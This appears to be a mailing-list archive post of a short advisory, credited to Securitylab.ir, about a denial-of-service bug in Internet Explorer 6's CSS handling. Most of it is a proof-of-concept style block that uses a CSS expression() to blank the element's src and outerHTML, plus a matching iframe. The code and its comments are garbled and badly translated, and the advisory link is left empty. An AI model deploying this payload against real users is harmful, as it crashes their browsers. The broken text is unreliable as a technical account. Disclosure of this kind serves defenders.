[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

IE6 css set Denial of Service Vulnerability

Published by Securitylab.ir
Founder: unknown

<style type="text/css">
<! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll ->
/*<![ CDATA [*/
f: expression(this.src='about:blank',this.outerHTML='');
# F126 (v: expression ()! Important)
</ Style>
<iframe id=f126 src=test>

Original Advisory: